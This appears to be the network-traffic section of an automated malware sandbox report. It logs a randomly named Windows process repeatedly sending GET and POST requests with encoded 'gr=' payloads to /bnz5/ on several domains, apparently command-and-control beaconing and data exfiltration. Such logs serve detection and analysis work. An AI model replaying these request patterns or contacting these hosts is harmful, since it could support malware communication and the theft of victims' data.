                                                                                                      Data Ascii: 22c<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49751 | 134.122.178.172 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:01:27.434969902 CEST | 447 | OUT | GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=BPQNeXp4G99ixa42Ae2HhZRkmtmfIWoN8C4XxZZLRtTgWub9dK20l7PCUAY7izqtYkjPPbLJsAPTHyCf3Tn8bJnCF1PYC6i+wP1GhXiXOwtWSBMDP4vgP+g0mku5o7pd9Q== HTTP/1.1
                                                                                                      Host: www.66bm99.shop
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:01:27.806138992 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 16 Apr 2024 10:01:27 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      Server: cdn-ddos-cc
                                                                                                      X-Cache-Status: MISS
                                                                                                      Data Ascii: 5b4<!DOCTYPE html><html lang="zh-CN" data-buildtime="4/1/2024, 22:27:05"> <head> <meta charset="utf-8"> <title></title> <meta name="next-font-preconnect"> <meta name="renderer" content="webkit"> <meta name="force-rendering" content="webkit"> <meta http-equiv="Content-Language" content="zh-CN"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="theme-color" content="#fff"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-touch-fullscreen" content="yes"> <meta name="referrer" content="origin"> <meta name="x5-orientation" content="portrait"> <meta name="google" content="notranslate"> <meta name="screen-orientation" content="portrait"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cover"> ... --> <style> .con { width: 100%; height: 100%;
Apr 16, 2024 12:01:27.806159973 CEST | 427 | IN
                                                                                                      Data Ascii: background: var(--cms-primary-background-color); position: fixed; left: 0; top: 0; display: flex; justify-content: center; align-items: center; } .loading { display: block;
Apr 16, 2024 12:01:27.806479931 CEST | 1289 | IN
                                                                                                      Data Ascii: 1986 } .loading:before, .loading:after { position: absolute; width: 6px; height: 10px; content: ""; background-color: var(--cms-primary-color); } .loading:before {
Apr 16, 2024 12:01:27.806552887 CEST | 1289 | IN
                                                                                                      Data Ascii: 999999 !important; } img[src=""], img:not([src]) { opacity: 0; } .geetest_popup_ghost { width: 100%; height: calc(100vh); } </style> <meta name="keywords" content=""> <met
Apr 16, 2024 12:01:27.806570053 CEST | 1289 | IN
                                                                                                      Data Ascii: ,"animation":"casino"},{"name":"","path":"/sport"},{"name":"","path":"/activity"},{"name":"","path":"/customer"},{"name":"","path":"/account","animation":"mine"}],"mobileMineSwitchList":["grxx","grzl","wdxx","zjmx","czd
Apr 16, 2024 12:01:27.806586981 CEST | 1289 | IN
                                                                                                      Data Ascii: var o = 0; document.documentElement.addEventListener("touchstart", function (n) { 1 < n.touches.length && n.preventDefault(); }); document.documentElement.addEventListener("touchend", function
Apr 16, 2024 12:01:27.806603909 CEST | 1289 | IN
                                                                                                      Data Ascii: rs.cf055a64.js"></script><script defer="defer" src="/js/cms-sports.25f4915f.js"></script><script defer="defer" src="/js/index.6ea0f2b0.js"></script><link href="/css/chunk-vendors.4f666f70.css" rel="stylesheet"><link href="/css/cms-sports.5951e
Apr 16, 2024 12:01:27.806622982 CEST | 102 | IN
                                                                                                      Data Ascii: erHTML = item; } document.body.appendChild(ele); }); } }</script>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49752 | 37.61.232.138 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:01:33.907092094 CEST | 727 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.wedgetechflash.co.ke
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.wedgetechflash.co.ke
                                                                                                      Referer: http://www.wedgetechflash.co.ke/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=4hykkgCMPZlTzGtiH2jvDZySiBbky/GDXMas71ZoMjUYfC411QVa/l5Wlrw6iqfhAzDMBKGpTvXjKZ6DLFC3I4MgJuHo5ydoRVJ4ntbh4YRBbEfNxWcMOnhIVswC2A8eCHiGsbaDHLHacOMwlbXlosku6cTL/VgegebIOHp/0s1Q/6ieVPfwAc3uIAuKOOkFsV50jdk=
Apr 16, 2024 12:01:36.347651005 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:34 GMT
                                                                                                      Server: Apache
                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/"
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      X-Endurance-Cache-Level: 0
                                                                                                      X-nginx-cache: WordPress
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Data Ascii: 4000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v22.3 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Wedgetech Flash</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Wedgetech Flash" /><meta property="og:site_name" content="Wedgetech Flash" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://wedgetechflash.co.ke/#website","url":"https://wedgetechflash.co.ke/","name":"Wedgetech Flash","descri
Apr 16, 2024 12:01:36.347678900 CEST | 1289 | IN
                                                                                                      Data Ascii: ption":"","publisher":{"@id":"https://wedgetechflash.co.ke/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://wedgetechflash.co.ke/?s={search_term_string}"},"query-input":"required
Apr 16, 2024 12:01:36.347696066 CEST | 1289 | IN
                                                                                                      Data Ascii: /wedgetechflash.co.ke/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","sou
Apr 16, 2024 12:01:36.347712994 CEST | 1289 | IN
                                                                                                      Data Ascii: b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElemen
Apr 16, 2024 12:01:36.347732067 CEST | 1289 | IN
                                                                                                      Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
Apr 16, 2024 12:01:36.347748041 CEST | 1289 | IN
                                                                                                      Data Ascii: .alignwide,.ast-no-sidebar .entry-content .alignwide .alignfull,.ast-no-sidebar .entry-content .alignwide .alignwide,.ast-no-sidebar .entry-content .wp-block-column .alignfull,.ast-no-sidebar .entry-content .wp-block-column .alignwide{width:
Apr 16, 2024 12:01:36.347764969 CEST | 1289 | IN
                                                                                                      Data Ascii: der-bottom: 4px solid #555d66;color: #40464d;}:root{--ast-container-default-xlg-padding:6.67em;--ast-container-default-lg-padding:5.67em;--ast-container-default-slg-padding:4.34em;--ast-container-default-md-padding:3.34em;--ast-container-defau
Apr 16, 2024 12:01:36.347780943 CEST | 1289 | IN
                                                                                                      Data Ascii: ast-article-post .ast-article-inner:hover,.blog .ast-article-post .ast-article-inner:hover{overflow:hidden;}h1,.entry-content h1{font-size:40px;font-size:2.6666666666667rem;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2.133
Apr 16, 2024 12:01:36.347798109 CEST | 1289 | IN
                                                                                                      Data Ascii: ckbox"]:focus:checked,input[type=range]::-webkit-slider-thumb{border-color:#79808d;background-color:#79808d;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#79808d;border-color:#79808d;}.single
                                                                                                      Apr 16, 2024 12:01:36.347816944 CEST1289INData Raw: 6d 2c 2e 61 73 74 2d 68 65 61 64 65 72 2d 73 65 61 72 63 68 20 2e 61 73 74 2d 73 65 61 72 63 68 2d 6d 65 6e 75 2d 69 63 6f 6e 2e 61 73 74 2d 64 72 6f 70 64 6f 77 6e 2d 61 63 74 69 76 65 20 2e 73 65 61 72 63 68 2d 66 69 65 6c 64 3a 66 6f 63 75 73
                                                                                                      Data Ascii: m,.ast-header-search .ast-search-menu-icon.ast-dropdown-active .search-field:focus{transition:all 0.2s;}.search-form input.search-field:focus{outline:none;}.widget-title,.widget .wp-block-heading{font-size:21px;font-size:1.4rem;color:var(--ast


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 49753 | 37.61.232.138 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:01:37.734481096 CEST | 747 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.wedgetechflash.co.ke
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.wedgetechflash.co.ke
                                                                                                      Referer: http://www.wedgetechflash.co.ke/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:01:40.110578060 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:37 GMT
                                                                                                      Server: Apache
                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/"
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      X-Endurance-Cache-Level: 0
                                                                                                      X-nginx-cache: WordPress
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49754 | 37.61.232.138 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:01:40.473253965 CEST | 1764 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.wedgetechflash.co.ke
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.wedgetechflash.co.ke
                                                                                                      Referer: http://www.wedgetechflash.co.ke/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Apr 16, 2024 12:01:42.938029051 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                      Date: Tue, 16 Apr 2024 10:01:40 GMT
                                                                                                      Server: Apache
                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      Link: <https://wedgetechflash.co.ke/wp-json/>; rel="https://api.w.org/"
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      X-Endurance-Cache-Level: 0
                                                                                                      X-nginx-cache: WordPress
                                                                                                      Connection: close
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Data Ascii: m,.ast-header-search .ast-search-menu-icon.ast-dropdown-active .search-field:focus{transition:all 0.2s;}.search-form input.search-field:focus{outline:none;}.widget-title,.widget .wp-block-heading{font-size:21px;font-size:1.4rem;color:var(--ast


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      36 | 192.168.2.5 | 49755 | 37.61.232.138 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:01:43.225009918 CEST | 456 | OUT | GET /bnz5/?gr=1jaEnVPJQbBr8WwKNEfMHYGZjhye5aSOWdurwFccCTE0UU1/+EdJo2t+tokAsIL/Mwf8dbmtfOzyBKuFYSi0CvpWL7by1S5GZC5tkYq+xKghYmLhmWFfGXtgNdAY2BZgRg==&kFGTX=Q6OxIXo8tXD HTTP/1.1
                                                                                                      Host: www.wedgetechflash.co.ke
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:01:45.055211067 CEST | 608 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                      Date: Tue, 16 Apr 2024 10:01:43 GMT
                                                                                                      Server: Apache
                                                                                                      X-Powered-By: PHP/7.4.33
                                                                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                      X-Redirect-By: WordPress
                                                                                                      Location: http://wedgetechflash.co.ke/bnz5/?gr=1jaEnVPJQbBr8WwKNEfMHYGZjhye5aSOWdurwFccCTE0UU1/+EdJo2t+tokAsIL/Mwf8dbmtfOzyBKuFYSi0CvpWL7by1S5GZC5tkYq+xKghYmLhmWFfGXtgNdAY2BZgRg==&kFGTX=Q6OxIXo8tXD
                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                      X-Endurance-Cache-Level: 0
                                                                                                      X-nginx-cache: WordPress
                                                                                                      Content-Length: 0
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=UTF-8


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      37 | 192.168.2.5 | 49756 | 103.66.94.182 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:01:51.360178947 CEST | 712 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.ojyphyi.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.ojyphyi.website
                                                                                                      Referer: http://www.ojyphyi.website/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=A4aLdhqoOnC+WTfChQW3XM2AlmrRc4QYGzj2j9Qqxg5n3GZIeVDLiQhfwfVnV9jZjPnSMPTmkeaDfjWp6cELNhD01Jxf2f7x08ZM/kRRdGAxkvhBJa49sC0DpVHI56/eFVfEjhNZYzQl+1SzMjQRUGB571WHR2wNgnV/KxiG55o41tLuxbjqBVPZknY9N7H8f3te04Q=
                                                                                                      Apr 16, 2024 12:01:51.680154085 CEST | 257 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 16 Apr 2024 10:01:51 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Request-Id: 44beef8136b1096c5a45bf1fb0196abc
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cb cf ce 06 00 b3 5f a3 e0 03 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 17_0


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      38 | 192.168.2.5 | 49757 | 103.66.94.182 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:01:54.171704054 CEST | 732 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.ojyphyi.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.ojyphyi.website
                                                                                                      Referer: http://www.ojyphyi.website/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=A4aLdhqoOnC+EivCg3C3fM2Do2rRXYQmGzv2j486xStn2npIfUDLvwhf7/UvadjSjP7sMO/mkayDfhep9rwMNxDy9pxRpv7x08ZM/kFrdGYxkfRBK74ymi0AuVHIzq/aFVeTjgg0YxYl+0izMyQSN2B3mlXFV2EF52JjP3nOgr8f0bmEr5rCS1jh00QKcLmVFU9uqvGse5Fl6+GUPct692VB1Zcf
                                                                                                      Apr 16, 2024 12:01:54.465214968 CEST | 257 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 16 Apr 2024 10:01:54 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Request-Id: a0b08fd9667ceac665eb92636895e129
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cb cf ce 06 00 b3 5f a3 e0 03 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 17_0


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      39 | 192.168.2.5 | 49758 | 103.66.94.182 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:01:57.018789053 CEST | 1749 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.ojyphyi.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 1239
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.ojyphyi.website
                                                                                                      Referer: http://www.ojyphyi.website/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:01:57.338810921 CEST | 257 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 16 Apr 2024 10:01:57 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Request-Id: c0ef5af0f91691d3631623b4348a82e3
                                                                                                      Content-Encoding: gzip
                                                                                                      Data Raw: 31 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cb cf ce 06 00 b3 5f a3 e0 03 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 17_0


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      40 | 192.168.2.5 | 49759 | 103.66.94.182 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:01:59.827336073 CEST | 451 | OUT | GET /bnz5/?kFGTX=Q6OxIXo8tXD&gr=N6yreUGrEwmnZyuRuhm7fu2pjjSQdKU6BgmK3dVc5hhl4QdzezeViDhR5sAjVdDUmsLMRcLdrvPdYjLD7b1ZIx3A1Z1l9931wLtzigwrLlFKueBnJaM0qh412Fe43461Qw== HTTP/1.1
                                                                                                      Host: www.ojyphyi.website
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Apr 16, 2024 12:02:00.119285107 CEST | 212 | IN | HTTP/1.1 200 OK
                                                                                                      Date: Tue, 16 Apr 2024 10:01:59 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      X-Request-Id: 63808f8d6aad44158681186305f43f6d
                                                                                                      Data Raw: 33 0d 0a 6f 6b 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 3okk0


                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                      41 | 192.168.2.5 | 49760 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                      Apr 16, 2024 12:02:26.778486967 CEST | 709 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.myspinpods.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 203
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.myspinpods.com
                                                                                                      Referer: http://www.myspinpods.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=QHAW2Cc+4UNVqkUlLv5l4VLocP//HQEItZHkZsf+oOa1FshipwfDYxUTllBFU+SUQJivWPx1TvJjR8NPNK8jMZijn9eaRN74tTi7gEVCkB7rW0cRJ32YB8BusNqltRrB+oci/FA4I+Nt0XvswDQ/BYLECQsPwb5CR+C5sVvhfBeZQ2LSw3nag84URPYQUmh+8AVLYSY=
                                                                                                      Apr 16, 2024 12:02:26.991115093 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:02:26 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
                                                                                                      Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49761 | 91.195.240.117 | 80 | 2940 | C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
Timestamp | Bytes transferred | Direction | Data
Apr 16, 2024 12:02:29.510859966 CEST | 729 | OUT | POST /bnz5/ HTTP/1.1
                                                                                                      Host: www.myspinpods.com
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Cache-Control: max-age=0
                                                                                                      Connection: close
                                                                                                      Content-Length: 223
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Origin: http://www.myspinpods.com
                                                                                                      Referer: http://www.myspinpods.com/bnz5/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                                      Data Ascii: gr=QHAW2Cc+4UNVrAQlYcRl+1LrC///cAFgtZbkZtq5o8+1EOpiuy7DfxUT8VBcKOSbQJ+nWPd1Tv1jR4JPN5UkKZihudeYVN74tTi7gEAZkATrWEsRIVeZPcBtktql7hrF+ocE/EcSI7Jt0WfsxSQ+PYLCMwtr4Jw5d/r1nXGwYSHncgm4qVvyzcUsBcQnFWAXmjF7GFOt8tUX97lKh4Igwa3x/44M
Apr 16, 2024 12:02:29.722429037 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                      date: Tue, 16 Apr 2024 10:02:29 GMT
                                                                                                      content-type: text/html
                                                                                                      content-length: 556
                                                                                                      server: NginX
                                                                                                      connection: close
